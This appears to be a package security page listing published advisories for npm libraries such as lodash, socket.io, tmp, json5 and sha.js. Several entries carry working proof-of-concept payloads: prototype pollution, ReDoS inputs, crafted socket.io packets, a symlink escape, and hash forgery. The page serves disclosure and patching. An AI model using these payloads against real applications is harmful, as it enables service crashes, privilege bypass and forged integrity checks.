All vulnerabilities related to version 1.0.0 of the package
Cross-site Scripting in karma
karma prior to version 6.3.14 contains a cross-site scripting vulnerability.
Open redirect in karma
Karma before 6.3.16 is vulnerable to Open Redirect due to missing validation of the return_url query parameter.
Command Injection in lodash
lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.
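A minimal sketch of the published attack vector, assuming a vulnerable lodash release; the injected string below is illustrative and relies on the `variable` option being interpolated, unsanitized, into the source of the compiled template function:

```js
const _ = require("lodash"); // assumed < 4.17.21

// The `variable` option is inserted into the compiled template source without
// sanitization, so a crafted value can break out of the parameter list and
// smuggle arbitrary code into the generated function.
const compiled = _.template("", {
  variable: '){console.log("injected code ran")}; with(obj',
});

compiled(); // prints "injected code ran" on vulnerable versions; patched lodash rejects the option
```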
Prototype Pollution in lodash
Versions of lodash before 4.17.11 are vulnerable to prototype pollution.
The vulnerable functions are 'defaultsDeep', 'merge', and 'mergeWith' which allow a malicious user to modify the prototype of Object via {constructor: {prototype: {...}}} causing the addition or modification of an existing property that will exist on all objects.
Update to version 4.17.11 or later.
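A minimal sketch of the vector described above, assuming a lodash release prior to 4.17.11; the property name `polluted` is illustrative:

```js
const _ = require("lodash"); // assumed < 4.17.11

// A JSON payload that reaches Object.prototype through the constructor reference.
const payload = JSON.parse('{"constructor": {"prototype": {"polluted": "yes"}}}');
_.defaultsDeep({}, payload);

console.log({}.polluted); // "yes" on vulnerable versions, undefined once patched
```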
Prototype Pollution in lodash
Versions of lodash before 4.17.5 are vulnerable to prototype pollution.
The vulnerable functions are 'defaultsDeep', 'merge', and 'mergeWith' which allow a malicious user to modify the prototype of Object via __proto__ causing the addition or modification of an existing property that will exist on all objects.
Update to version 4.17.5 or later.
Prototype Pollution in lodash
Versions of lodash before 4.17.12 are vulnerable to Prototype Pollution. The function defaultsDeep allows a malicious user to modify the prototype of Object via {constructor: {prototype: {...}}} causing the addition or modification of an existing property that will exist on all objects.
Update to version 4.17.12 or later.
Prototype Pollution in lodash
Versions of lodash prior to 4.17.19 are vulnerable to Prototype Pollution. The functions pick, set, setWith, update, updateWith, and zipObjectDeep allow a malicious user to modify the prototype of Object if the property identifiers are user-supplied. Being affected by this issue requires manipulating objects based on user-provided property values or arrays.
This vulnerability causes the addition or modification of an existing property that will exist on all objects and may lead to Denial of Service or Code Execution under specific circumstances.
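A hedged sketch using one of the listed functions (zipObjectDeep), assuming a lodash release prior to 4.17.19 and an attacker-supplied property path; the property name `polluted` is illustrative:

```js
const _ = require("lodash"); // assumed < 4.17.19

// The property path is attacker-controlled; a `__proto__` segment makes
// zipObjectDeep write onto Object.prototype instead of the target object.
_.zipObjectDeep(["__proto__.polluted"], [true]);

console.log({}.polluted); // true on vulnerable versions
```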
Incorrect Default Permissions in log4js
Default file permissions for log files created by the file, fileSync and dateFile appenders are world-readable (in unix). This could cause problems if log files contain sensitive information. This would affect any users that have not supplied their own permissions for the files via the mode parameter in the config.
Fixed by a patch released to NPM in log4js@6.4.0.
Every version of log4js published allows passing the mode parameter to the configuration of file appenders, see the documentation for details.
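A minimal configuration sketch of that workaround; the appender name and filename are illustrative, and `mode` is the documented file appender option mentioned above:

```js
const log4js = require("log4js");

log4js.configure({
  appenders: {
    // Restrict permissions of the created log file (owner read/write only)
    // instead of relying on the world-readable default.
    app: { type: "file", filename: "application.log", mode: 0o600 },
  },
  categories: {
    default: { appenders: ["app"], level: "info" },
  },
});

log4js.getLogger().info("log file created with restrictive permissions");
```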
Thanks to ranjit-git for raising the issue, and to @lamweili for fixing the problem.
semver vulnerable to Regular Expression Denial of Service
Versions of the package semver before 7.5.2 on the 7.x branch, before 6.3.1 on the 6.x branch, and all other versions before 5.7.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range.
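A hedged sketch of the exposure, assuming untrusted input reaches new Range on a vulnerable semver release; the payload below (a long run of spaces) is illustrative, not the exact string from the advisory:

```js
const semver = require("semver"); // assumed vulnerable (<5.7.2, 6.x <6.3.1, 7.x <7.5.2)

// Illustrative untrusted range: long whitespace runs are the kind of input
// that can trigger catastrophic backtracking in the range-parsing regexes.
const untrustedRange = "^1.0.0" + " ".repeat(50000) + "x";

try {
  new semver.Range(untrustedRange); // may hang on vulnerable versions
} catch (err) {
  // a patched release parses or rejects the range quickly instead of hanging
  console.error(err.message);
}
```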
Regular Expression Denial of Service (ReDoS) in micromatch
The NPM package micromatch prior to version 4.0.8 is vulnerable to Regular Expression Denial of Service (ReDoS). The vulnerability occurs in micromatch.braces() in index.js because the pattern .* will greedily match anything. By passing a malicious payload, the pattern matching will keep backtracking to the input while it doesn't find the closing bracket. As the input size increases, the consumption time will also increase until it causes the application to hang or slow down. There was a merged fix but further testing shows the issue persisted prior to https://github.com/micromatch/micromatch/pull/266. This issue should be mitigated by using a safe pattern that won't start backtracking the regular expression due to greedy matching.
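A hedged sketch of that behaviour, assuming a micromatch release prior to 4.0.8; the payload is illustrative and follows the advisory's description of a long input with an unmatched opening bracket:

```js
const micromatch = require("micromatch"); // assumed < 4.0.8

// An opening brace that is never closed forces the vulnerable pattern to keep
// backtracking over the long input while searching for the closing bracket.
const payload = "{" + ",".repeat(50000);

micromatch.braces(payload); // may hang or slow down on vulnerable versions
```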
Regular Expression Denial of Service in braces
Versions of braces prior to 2.3.1 are vulnerable to Regular Expression Denial of Service (ReDoS). Untrusted input may cause catastrophic backtracking while matching regular expressions. This can cause the application to be unresponsive leading to Denial of Service.
Upgrade to version 2.3.1 or higher.
Uncontrolled resource consumption in braces
The NPM package braces fails to limit the number of characters it can handle, which could lead to Memory Exhaustion. In lib/parse.js, if a malicious user sends "imbalanced braces" as input, the parsing will enter a loop, which will cause the program to start allocating heap memory without freeing it at any moment of the loop. Eventually, the JavaScript heap limit is reached, and the program will crash.
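A hedged sketch, assuming a braces release without the input-length limit; the repeated opening braces are the "imbalanced braces" input described above:

```js
const braces = require("braces"); // assumed vulnerable version

// Imbalanced input: many opening braces with no closing counterpart.
// On vulnerable versions the parser keeps allocating heap memory for this
// input until the JavaScript heap limit is reached and the process crashes.
const imbalanced = "{".repeat(500000);

braces(imbalanced);
```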
Prototype Pollution in minimist
Affected versions of minimist are vulnerable to prototype pollution. Arguments are not properly sanitized, allowing an attacker to modify the prototype of Object, causing the addition or modification of an existing property that will exist on all objects.
Parsing the argument --__proto__.y=Polluted adds a y property with value Polluted to all objects. The argument --__proto__=Polluted raises an uncaught error and crashes the application.
This is exploitable if attackers have control over the arguments being passed to minimist.
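A minimal sketch of the behaviour described above, assuming a vulnerable minimist release and attacker-influenced arguments:

```js
const minimist = require("minimist"); // assumed < 0.2.1 / < 1.2.3

// Parsing attacker-controlled arguments pollutes Object.prototype.
minimist(["--__proto__.y=Polluted"]);

console.log({}.y); // "Polluted" on vulnerable versions
```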
Upgrade to versions 0.2.1, 1.2.3 or later.
Prototype Pollution in minimist
Minimist prior to 1.2.6 and 0.2.4 is vulnerable to Prototype Pollution via file index.js, function setKey() (lines 69-95).
socket.io has an unhandled 'error' event
A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process.
node:events:502
throw err; // Unhandled 'error' event
^
Error [ERR_UNHANDLED_ERROR]: Unhandled error. (undefined)
at new NodeError (node:internal/errors:405:5)
at Socket.emit (node:events:500:17)
at /myapp/node_modules/socket.io/lib/socket.js:531:14
at process.processTicksAndRejections (node:internal/process/task_queues:77:11) {
code: 'ERR_UNHANDLED_ERROR',
context: undefined
}
| Version range | Needs minor update? |
|------------------|------------------------------------------------|
| 4.6.2...latest | Nothing to do |
| 3.0.0...4.6.1 | Please upgrade to socket.io@4.6.2 (at least) |
| 2.3.0...2.5.0 | Please upgrade to socket.io@2.5.1 |
This issue is fixed by https://github.com/socketio/socket.io/commit/15af22fc22bc6030fcead322c106f07640336115, included in socket.io@4.6.2 (released in May 2023).
The fix was backported in the 2.x branch today: https://github.com/socketio/socket.io/commit/d30630ba10562bf987f4d2b42440fc41a828119c
As a workaround for the affected versions of the socket.io package, you can attach a listener for the "error" event:
io.on("connection", (socket) => {
socket.on("error", () => {
// ...
});
});
Thanks a lot to Paul Taylor for the responsible disclosure.
CORS misconfiguration in socket.io
The package socket.io before 2.4.0 is vulnerable to Insecure Defaults due to CORS Misconfiguration. All domains are whitelisted by default.
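A hedged configuration sketch for the 2.x line, assuming the `origins` server option; the origin value is illustrative. Explicitly restricting origins avoids relying on the permissive default:

```js
const http = require("http");
const httpServer = http.createServer();

// socket.io 2.x: whitelist specific origins explicitly instead of the
// default, which allows every domain.
const io = require("socket.io")(httpServer, {
  origins: "https://example.com:443",
});

io.on("connection", (socket) => {
  // handle connections from allowed origins only
});

httpServer.listen(3000);
```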
Resource exhaustion in engine.io
Engine.IO before 4.0.0 and 3.6.0 allows attackers to cause a denial of service (resource consumption) via a POST request to the long polling transport.
Uncaught exception in engine.io
A specially crafted HTTP request can trigger an uncaught exception on the Engine.IO server, thus killing the Node.js process.
events.js:292
throw er; // Unhandled 'error' event
^
Error: read ECONNRESET
at TCP.onStreamRead (internal/stream_base_commons.js:209:20)
Emitted 'error' event on Socket instance at:
at emitErrorNT (internal/streams/destroy.js:106:8)
at emitErrorCloseNT (internal/streams/destroy.js:74:3)
at processTicksAndRejections (internal/process/task_queues.js:80:21) {
errno: -104,
code: 'ECONNRESET',
syscall: 'read'
}
This impacts all users of the engine.io package, including those who use dependent packages like socket.io.
A fix has been released today (2022/11/20):
| Version range | Fixed version |
|-------------------|---------------|
| engine.io@3.x.y | 3.6.1 |
| engine.io@6.x.y | 6.2.1 |
For socket.io users:
| Version range | engine.io version | Needs minor update? |
|-----------------------------|---------------------|--------------------------------------------------------------------------------------------------------|
| socket.io@4.5.x | ~6.2.0 | npm audit fix should be sufficient |
| socket.io@4.4.x | ~6.1.0 | Please upgrade to socket.io@4.5.x |
| socket.io@4.3.x | ~6.0.0 | Please upgrade to socket.io@4.5.x |
| socket.io@4.2.x | ~5.2.0 | Please upgrade to socket.io@4.5.x |
| socket.io@4.1.x | ~5.1.1 | Please upgrade to socket.io@4.5.x |
| socket.io@4.0.x | ~5.0.0 | Please upgrade to socket.io@4.5.x |
| socket.io@3.1.x             | ~4.1.0              | Please upgrade to socket.io@4.5.x                                                                        |
| socket.io@3.0.x             | ~4.0.0              | Please upgrade to socket.io@4.5.x                                                                        |
| socket.io@2.5.0 | ~3.6.0 | npm audit fix should be sufficient |
| socket.io@2.4.x and below | ~3.5.0 | Please upgrade to socket.io@2.5.0 |
There is no known workaround except upgrading to a safe version.
Thanks to Jonathan Neve for the responsible disclosure.
cookie accepts cookie name, path, and domain with out of bounds characters
The cookie name could be used to set other fields of the cookie, resulting in an unexpected cookie value. For example, serialize("userName=<script>alert('XSS3')</script>; Max-Age=2592000; a", value) would result in "userName=<script>alert('XSS3')</script>; Max-Age=2592000; a=test", setting userName cookie to <script> and ignoring value.
A similar escape can be used for path and domain, which could be abused to alter other fields of the cookie.
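A short reproduction of the example above, assuming a cookie release prior to 0.7.0:

```js
const cookie = require("cookie"); // assumed < 0.7.0

// Out-of-bounds characters in the name smuggle extra fields into the
// serialized string, and the intended value ("test") is ignored.
const out = cookie.serialize(
  "userName=<script>alert('XSS3')</script>; Max-Age=2592000; a",
  "test"
);

console.log(out);
// userName=<script>alert('XSS3')</script>; Max-Age=2592000; a=test
```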
Upgrade to 0.7.0, which updates the validation for name, path, and domain.
Avoid passing untrusted or arbitrary values for these fields, ensure they are set by the application instead of user input.
parse-uri Regular expression Denial of Service (ReDoS)
An issue in parse-uri v1.0.9 allows attackers to cause a Regular expression Denial of Service (ReDoS) via a crafted URL.
const parseuri = require("parse-uri"); // v1.0.9 as reported in the advisory

function exploit() {
  // This input is designed to cause excessive backtracking in the regex
  const craftedInput = 'http://example.com/' + 'a'.repeat(30000) + '?key=value';
  // parse-uri is synchronous; this call may hang on vulnerable versions
  return parseuri(craftedInput);
}

exploit();
Regular Expression Denial of Service in parsejson
Affected versions of parsejson are vulnerable to a regular expression denial of service when parsing untrusted user input.
The parsejson package has not been functionally updated since it was initially released.
Additionally, it provides functionality which is natively included in Node.js, and therefore the native JSON.parse() should be used, for both performance and security reasons.
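A small sketch of that recommendation; `untrustedInput` is an illustrative stand-in for client-supplied data:

```js
// `untrustedInput` stands in for data received from a client.
const untrustedInput = '{"a": 1}';

// Instead of: require("parsejson")(untrustedInput)
// use the built-in parser, which avoids the vulnerable regular expression:
let data;
try {
  data = JSON.parse(untrustedInput);
} catch (err) {
  data = null; // handle malformed input explicitly
}

console.log(data);
```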
Insufficient validation when decoding a Socket.IO packet
A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process.
TypeError: Cannot convert object to primitive value
at Socket.emit (node:events:507:25)
at .../node_modules/socket.io/lib/socket.js:531:14
A fix has been released today (2023/05/22): socket.io-parser@4.2.3 and socket.io-parser@3.4.3. Another fix has been released for the 3.3.x branch.
| socket.io version | socket.io-parser version | Needs minor update? |
|---------------------|---------------------------------------------------------------------------------------------------------|--------------------------------------|
| 4.5.2...latest      | ~4.2.0                    | npm audit fix should be sufficient   |
| 4.1.3...4.5.1       | ~4.1.1                    | Please upgrade to socket.io@4.6.x    |
| 3.0.5...4.1.2       | ~4.0.3                    | Please upgrade to socket.io@4.6.x    |
| 3.0.0...3.0.4       | ~4.0.1                    | Please upgrade to socket.io@4.6.x    |
| 2.3.0...2.5.0       | ~3.4.0                    | npm audit fix should be sufficient   |
There is no known workaround except upgrading to a safe version.
Thanks to @rafax00 for the responsible disclosure.
Insufficient validation when decoding a Socket.IO packet
Due to improper type validation in the socket.io-parser library (which is used by the socket.io and socket.io-client packages to encode and decode Socket.IO packets), it is possible to overwrite the _placeholder object which allows an attacker to place references to functions at arbitrary places in the resulting query object.
Example:
const { Decoder } = require("socket.io-parser");

const decoder = new Decoder();
decoder.on("decoded", (packet) => {
console.log(packet.data); // prints [ 'hello', [Function: splice] ]
})
decoder.add('51-["hello",{"_placeholder":true,"num":"splice"}]');
decoder.add(Buffer.from("world"));
This bubbles up in the socket.io package:
io.on("connection", (socket) => {
socket.on("hello", (val) => {
// here, "val" could be a function instead of a buffer
});
});
:warning: IMPORTANT NOTE :warning:
You need to make sure that the payload that you received from the client is actually a Buffer object:
io.on("connection", (socket) => {
socket.on("hello", (val) => {
if (!Buffer.isBuffer(val)) {
socket.disconnect();
return;
}
// ...
});
});
If that's already the case, then you are not impacted by this issue, and there is no way an attacker could make your server crash (or escalate privileges, ...).
Examples of values that could be sent by a malicious user:
A number, like 10:
Sample packet: 451-["hello",{"_placeholder":true,"num":10}]
io.on("connection", (socket) => {
socket.on("hello", (val) => {
// val is `undefined`
});
});
undefined:
Sample packet: 451-["hello",{"_placeholder":true,"num":undefined}]
io.on("connection", (socket) => {
socket.on("hello", (val) => {
// val is `undefined`
});
});
A property of Array, like "push":
Sample packet: 451-["hello",{"_placeholder":true,"num":"push"}]
io.on("connection", (socket) => {
socket.on("hello", (val) => {
// val is a reference to the "push" function
});
});
A property of Object, like "hasOwnProperty":
Sample packet: 451-["hello",{"_placeholder":true,"num":"hasOwnProperty"}]
io.on("connection", (socket) => {
socket.on("hello", (val) => {
// val is a reference to the "hasOwnProperty" function
});
});
This should be fixed by:
- socket.io-parser@4.2.1
- socket.io-parser@4.0.5
- socket.io-parser@3.4.2
- socket.io-parser@3.3.3

For the socket.io package:

| socket.io version   | socket.io-parser version | Covered?                |
|---------------------|---------------------------|-------------------------|
| 4.5.2...latest      | ~4.2.0                    | Yes :heavy_check_mark:  |
| 4.1.3...4.5.1       | ~4.0.4                    | Yes :heavy_check_mark:  |
| 3.0.5...4.1.2       | ~4.0.3                    | Yes :heavy_check_mark:  |
| 3.0.0...3.0.4       | ~4.0.1                    | Yes :heavy_check_mark:  |
| 2.3.0...2.5.0       | ~3.4.0                    | Yes :heavy_check_mark:  |
For the socket.io-client package:

| socket.io-client version   | socket.io-parser version | Covered?                            |
|----------------------------|---------------------------|-------------------------------------|
| 4.5.0...latest             | ~4.2.0                    | Yes :heavy_check_mark:              |
| 4.3.0...4.4.1              | ~4.1.1                    | No, but the impact is very limited  |
| 3.1.0...4.2.0              | ~4.0.4                    | Yes :heavy_check_mark:              |
| 3.0.5                      | ~4.0.3                    | Yes :heavy_check_mark:              |
| 3.0.0...3.0.4              | ~4.0.1                    | Yes :heavy_check_mark:              |
| 2.2.0...2.5.0              | ~3.3.0                    | Yes :heavy_check_mark:              |
Resource exhaustion in socket.io-parser
The socket.io-parser npm package before versions 3.3.2 and 3.4.1 allows attackers to cause a denial of service (memory consumption) via a large packet because a concatenation approach is used.
useragent Regular Expression Denial of Service vulnerability
Useragent is a user agent parser for Node.js. All versions as of the time of publication contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS).
const useragent = require("useragent");

function exploit() {
  // Create a malicious user-agent that leads to excessive backtracking
  const maliciousUserAgent = 'Mozilla/5.0 (' + 'X'.repeat(30000) + ') Gecko/20100101 Firefox/77.0';
  // Parse the malicious user-agent
  const agent = useragent.parse(maliciousUserAgent);
  // Calling toString on the parsed device triggers the vulnerable regular expressions
  const result = agent.device.toString();
  console.log(result);
}

exploit();
tmp allows arbitrary temporary file / directory write via symbolic link dir parameter
tmp@0.2.3 is vulnerable to an arbitrary temporary file / directory write via a symbolic link passed in the dir parameter.
According to the documentation, there are some conditions that must hold:
// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L41-L50
Other breaking changes, i.e.
- template must be relative to tmpdir
- name must be relative to tmpdir
- dir option must be relative to tmpdir //<-- this assumption can be bypassed using symlinks
are still in place.
In order to override the system's tmpdir, you will have to use the newly
introduced tmpdir option.
// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L375
* `dir`: the optional temporary directory that must be relative to the system's default temporary directory.
absolute paths are fine as long as they point to a location under the system's default temporary directory.
Any directories along the so specified path must exist, otherwise a ENOENT error will be thrown upon access,
as tmp will not check the availability of the path, nor will it establish the requested path for you.
Related issue: https://github.com/raszi/node-tmp/issues/207.
The issue occurs because _resolvePath does not properly handle symbolic links when resolving paths:
// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L573-L579
function _resolvePath(name, tmpDir) {
if (name.startsWith(tmpDir)) {
return path.resolve(name);
} else {
return path.resolve(path.join(tmpDir, name));
}
}
If the dir parameter points to a symlink that resolves to a folder outside the tmpDir, it's possible to bypass the _assertIsRelative check used in _assertAndSanitizeOptions:
// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L590-L609
function _assertIsRelative(name, option, tmpDir) {
if (option === 'name') {
// assert that name is not absolute and does not contain a path
if (path.isAbsolute(name))
throw new Error(`${option} option must not contain an absolute path, found "${name}".`);
// must not fail on valid .<name> or ..<name> or similar such constructs
let basename = path.basename(name);
if (basename === '..' || basename === '.' || basename !== name)
throw new Error(`${option} option must not contain a path, found "${name}".`);
}
else { // if (option === 'dir' || option === 'template') {
// assert that dir or template are relative to tmpDir
if (path.isAbsolute(name) && !name.startsWith(tmpDir)) {
throw new Error(`${option} option must be relative to "${tmpDir}", found "${name}".`);
}
let resolvedPath = _resolvePath(name, tmpDir); //<---
if (!resolvedPath.startsWith(tmpDir))
throw new Error(`${option} option must be relative to "${tmpDir}", found "${resolvedPath}".`);
}
}
The following PoC demonstrates how writing a tmp file on a folder outside the tmpDir is possible.
Tested on a Linux machine.
Create a symlink inside the tmpDir that points to a directory outside of it:
mkdir $HOME/mydir1
ln -s $HOME/mydir1 ${TMPDIR:-/tmp}/evil-dir
ls -lha $HOME/mydir1 | grep "tmp-"
node main.js
File: /tmp/evil-dir/tmp-26821-Vw87SLRaBIlf
test 1: ENOENT: no such file or directory, open '/tmp/mydir1/tmp-[random-id]'
test 2: dir option must be relative to "/tmp", found "/foo".
test 3: dir option must be relative to "/tmp", found "/home/user/mydir1".
The temporary file is created in $HOME/mydir1 (outside the tmpDir):
ls -lha $HOME/mydir1 | grep "tmp-"
-rw------- 1 user user 0 Apr X XX:XX tmp-[random-id]
main.js:
// npm i tmp@0.2.3
const tmp = require('tmp');
const tmpobj = tmp.fileSync({ 'dir': 'evil-dir'});
console.log('File: ', tmpobj.name);
try {
tmp.fileSync({ 'dir': 'mydir1'});
} catch (err) {
console.log('test 1:', err.message)
}
try {
tmp.fileSync({ 'dir': '/foo'});
} catch (err) {
console.log('test 2:', err.message)
}
try {
const fs = require('node:fs');
const resolved = fs.realpathSync('/tmp/evil-dir');
tmp.fileSync({ 'dir': resolved});
} catch (err) {
console.log('test 3:', err.message)
}
A potential fix could be to call fs.realpathSync (or similar), which also resolves symbolic links:
function _resolvePath(name, tmpDir) {
let resolvedPath;
if (name.startsWith(tmpDir)) {
resolvedPath = path.resolve(name);
} else {
resolvedPath = path.resolve(path.join(tmpDir, name));
}
return fs.realpathSync(resolvedPath);
}
Prototype pollution in webpack loader-utils
Prototype pollution vulnerability in the parseQuery function in parseQuery.js in webpack loader-utils prior to version 2.0.3, via the name variable.
Prototype Pollution in JSON5 via Parse Method
The parse method of the JSON5 library before and including version 2.2.1 does not restrict parsing of keys named __proto__, allowing specially crafted strings to pollute the prototype of the resulting object.
This vulnerability pollutes the prototype of the object returned by JSON5.parse and not the global Object prototype, which is the commonly understood definition of Prototype Pollution. However, polluting the prototype of a single object can have significant security impact for an application if the object is later used in trusted operations.
This vulnerability could allow an attacker to set arbitrary and unexpected keys on the object returned from JSON5.parse. The actual impact will depend on how applications utilize the returned object and how they filter unwanted keys, but could include denial of service, cross-site scripting, elevation of privilege, and in extreme cases, remote code execution.
This vulnerability is patched in json5 v2.2.2 and later. A patch has also been backported for json5 v1 in versions v1.0.2 and later.
Suppose a developer wants to allow users and admins to perform some risky operation, but they want to restrict what non-admins can do. To accomplish this, they accept a JSON blob from the user, parse it using JSON5.parse, confirm that the provided data does not set some sensitive keys, and then performs the risky operation using the validated data:
const JSON5 = require('json5');
const doSomethingDangerous = (props) => {
if (props.isAdmin) {
console.log('Doing dangerous thing as admin.');
} else {
console.log('Doing dangerous thing as user.');
}
};
const secCheckKeysSet = (obj, searchKeys) => {
let searchKeyFound = false;
Object.keys(obj).forEach((key) => {
if (searchKeys.indexOf(key) > -1) {
searchKeyFound = true;
}
});
return searchKeyFound;
};
const props = JSON5.parse('{"foo": "bar"}');
if (!secCheckKeysSet(props, ['isAdmin', 'isMod'])) {
doSomethingDangerous(props); // "Doing dangerous thing as user."
} else {
throw new Error('Forbidden...');
}
If the user attempts to set the isAdmin key, their request will be rejected:
const props = JSON5.parse('{"foo": "bar", "isAdmin": true}');
if (!secCheckKeysSet(props, ['isAdmin', 'isMod'])) {
doSomethingDangerous(props);
} else {
throw new Error('Forbidden...'); // Error: Forbidden...
}
However, users can instead set the __proto__ key to {"isAdmin": true}. JSON5 will parse this key and will set the isAdmin key on the prototype of the returned object, allowing the user to bypass the security check and run their request as an admin:
const props = JSON5.parse('{"foo": "bar", "__proto__": {"isAdmin": true}}');
if (!secCheckKeysSet(props, ['isAdmin', 'isMod'])) {
doSomethingDangerous(props); // "Doing dangerous thing as admin."
} else {
throw new Error('Forbidden...');
}
sha.js is missing type checks leading to hash rewind and passing on crafted data
This is the same as GHSA-cpq7-6gpm-g9rc but just for sha.js, as it has its own implementation.
Missing input type checks can allow types other than a well-formed Buffer or string, resulting in invalid values, hanging and rewinding the hash state (including turning a tagged hash into an untagged hash), or other generally undefined behaviour.
See PoC
const forgeHash = (data, payload) => JSON.stringify([payload, { length: -payload.length}, [...data]])
const sha = require('sha.js')
const { randomBytes } = require('crypto')
const sha256 = (...messages) => {
const hash = sha('sha256')
messages.forEach((m) => hash.update(m))
return hash.digest('hex')
}
const validMessage = [randomBytes(32), randomBytes(32), randomBytes(32)] // whatever
const payload = forgeHash(Buffer.concat(validMessage), 'Hashed input means safe')
const receivedMessage = JSON.parse(payload) // e.g. over network, whatever
console.log(sha256(...validMessage))
console.log(sha256(...receivedMessage))
console.log(receivedMessage[0])
Output:
638d5bf3ca5d1decf7b78029f1c4a58558143d62d0848d71e27b2a6ff312d7c4
638d5bf3ca5d1decf7b78029f1c4a58558143d62d0848d71e27b2a6ff312d7c4
Hashed input means safe
Or just:
> require('sha.js')('sha256').update('foo').digest('hex')
'2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae'
> require('sha.js')('sha256').update('fooabc').update({length:-3}).digest('hex')
'2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae'
Examples of crafted inputs:
- {length: -x} — this is what the PoC above relies on; it also lets an attacker turn a tagged hash in cryptographic libraries into an untagged hash.
- { length: buf.length, ...buf, 0: buf[0] + 256 } — this results in the same hash as buf, but can be treated differently by other code (e.g. bn.js).
- {length: '1e99'}